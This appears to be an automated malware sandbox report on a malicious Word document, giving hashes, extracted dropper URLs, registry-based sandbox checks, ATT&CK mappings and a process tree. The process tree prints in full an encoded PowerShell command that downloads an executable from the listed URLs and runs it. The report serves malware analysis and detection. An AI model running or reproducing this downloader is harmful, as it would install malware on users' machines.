5b6b7894bd61356eb562f86f7b6ebbd0d44bde0ed133adbacffe224ebb53b1ac

General

Target

05de04c311c404e89ae6751f259ef61d_JaffaCakes118.doc
Size

160KB
MD5

05de04c311c404e89ae6751f259ef61d
SHA1

b35625efe34ae909139ff171e708477eadda1f6f
SHA256

5b6b7894bd61356eb562f86f7b6ebbd0d44bde0ed133adbacffe224ebb53b1ac
SHA512

c630b8beb11f8e04078f5621012977f32435f7507ef420e891a0f5bc65787fb359adca987c240ce8b5728170606b24fffd98c69c320ec3dde032868a8894fa75
SSDEEP

3072:+977HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfKbms7Ow9DXFMpzAK:c77HUUUUUUUUUUUUUUUUUUUT52VGemjl

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://siamnatural.com/tmp/EmC/

exe.dropper

http://chefmongiovi.com/wp/yigA/

exe.dropper

http://simplyresponsive.com/samples/3I/

exe.dropper

https://hechizosyconjurodeamor.info/wp-includes/FGF/

exe.dropper

http://visa.org.ua/wp-content/nnSZ/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	1268	powershell.exe	84

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
5056	WINWORD.EXE
5056	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2332	powershell.exe
2332	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2332	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE
5056	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\05de04c311c404e89ae6751f259ef61d_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABKAFUAQQBCAEEAWABrAFEAPQAoACcASwAnACsAJwBCAHgARABBAEEAJwApADsAJABmAEcARABBAEEAWgB4AD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWAFEAQQBfADQAVQA9ACgAJwBoAHQAdABwADoALwAvAHMAaQBhAG0AbgBhACcAKwAnAHQAdQAnACsAJwByACcAKwAnAGEAbAAuAGMAbwAnACsAJwBtAC8AdABtACcAKwAnAHAALwBFAG0AQwAnACsAJwAvAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwArACcALwBjAGgAZQBmAG0AbwAnACsAJwBuACcAKwAnAGcAJwArACcAaQBvAHYAJwArACcAaQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwAnACsAJwBwACcAKwAnAC8AJwArACcAeQBpAGcAQQAvACcAKwAnAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBzAGkAbQBwAGwAeQAnACsAJwByAGUAcwAnACsAJwBwAG8AJwArACcAbgBzACcAKwAnAGkAdgAnACsAJwBlAC4AYwBvACcAKwAnAG0ALwBzACcAKwAnAGEAbQBwACcAKwAnAGwAJwArACcAZQBzAC8AMwBJACcAKwAnAC8AQABoAHQAdABwAHMAOgAvACcAKwAnAC8AaABlACcAKwAnAGMAaABpACcAKwAnAHoAbwAnACsAJwBzAHkAYwAnACsAJwBvAG4AagB1AHIAbwAnACsAJwBkAGUAYQBtAG8AcgAuACcAKwAnAGkAbgBmAG8ALwAnACsAJwB3AHAALQBpAG4AYwBsAHUAZABlACcAKwAnAHMALwBGAEcAJwArACcARgAvAEAAJwArACcAaAB0AHQAcAA6AC8ALwB2AGkAJwArACcAcwBhAC4AbwByAGcALgB1AGEALwB3AHAALQBjAG8AbgB0AGUAJwArACcAbgB0ACcAKwAnAC8AbgAnACsAJwBuAFMAWgAvACcAKQAuACgAJwBTAHAAbAAnACsAJwBpAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnAEAAJwApADsAJABKAEQAWABCAEMAQwBCAF8APQAoACcAWgBBAFgAYwBBAEEAJwArACcAQgAnACkAOwAkAG8AawBfAFUAMQA0AFUAWgAgAD0AIAAoACcAOQAnACsAJwA2ADYAJwApADsAJABuAEEAQQBDAEEANABCAD0AKAAnAEUAJwArACcAQgB3AFoAXwAxACcAKQA7ACQAVABDAHcAWAB3AEEAVQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvAGsAXwBVADEANABVAFoAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABTAEEAUQB3AEIAXwBRACAAaQBuACAAJABWAFEAQQBfADQAVQApAHsAdAByAHkAewAkAGYARwBEAEEAQQBaAHgALgAoACcARAAnACsAJwBvAHcAbgBsAG8AYQBkACcAKwAnAEYAJwArACcAaQBsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAFMAQQBRAHcAQgBfAFEALAAgACQAVABDAHcAWAB3AEEAVQBvACkAOwAkAGYAXwBBAGMAQwAxAEcAPQAoACcAdAAnACsAJwB3AFUAVQBRAFgARAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAVABDAHcAWAB3AEEAVQBvACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawBlAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFQAQwB3AFgAdwBBAFUAbwA7ACQASABRAEEAQgBBAEQAPQAoACcAcQBvADEAJwArACcAQQBVAEcAQgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBVAEcAUQBBAEEARwB3AD0AKAAnAEsAJwArACcAVQAxAFUAQgBBADEAJwApADsA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_baphdblm.po5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2332-57-0x00007FFBC83E0000-0x00007FFBC8EA1000-memory.dmp

Filesize
10.8MB

Download
memory/2332-54-0x00007FFBC83E0000-0x00007FFBC8EA1000-memory.dmp

Filesize
10.8MB

Download
memory/2332-41-0x00007FFBC83E0000-0x00007FFBC8EA1000-memory.dmp

Filesize
10.8MB

Download
memory/2332-40-0x000001F742730000-0x000001F742752000-memory.dmp

Filesize
136KB

Download
memory/5056-28-0x000002413CC40000-0x000002413DC10000-memory.dmp

Filesize
15.8MB

Download
memory/5056-30-0x000002413CC40000-0x000002413DC10000-memory.dmp

Filesize
15.8MB

Download
memory/5056-10-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-9-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-8-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-7-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-13-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-12-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-11-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-14-0x00007FFBB06C0000-0x00007FFBB06D0000-memory.dmp

Filesize
64KB

Download
memory/5056-15-0x00007FFBB06C0000-0x00007FFBB06D0000-memory.dmp

Filesize
64KB

Download
memory/5056-20-0x00000241379F0000-0x00000241381F0000-memory.dmp

Filesize
8.0MB

Download
memory/5056-21-0x000002413DDA0000-0x000002413DFA0000-memory.dmp

Filesize
2.0MB

Download
memory/5056-0-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-29-0x000002413CC40000-0x000002413DC10000-memory.dmp

Filesize
15.8MB

Download
memory/5056-6-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-5-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-4-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-3-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-49-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download
memory/5056-50-0x00000241379F0000-0x00000241381F0000-memory.dmp

Filesize
8.0MB

Download
memory/5056-51-0x000002413DDA0000-0x000002413DFA0000-memory.dmp

Filesize
2.0MB

Download
memory/5056-52-0x000002413CC40000-0x000002413DC10000-memory.dmp

Filesize
15.8MB

Download
memory/5056-53-0x000002413CC40000-0x000002413DC10000-memory.dmp

Filesize
15.8MB

Download
memory/5056-2-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-1-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-79-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-78-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-77-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-76-0x00007FFBB2850000-0x00007FFBB2860000-memory.dmp

Filesize
64KB

Download
memory/5056-80-0x00007FFBF27D0000-0x00007FFBF29C5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads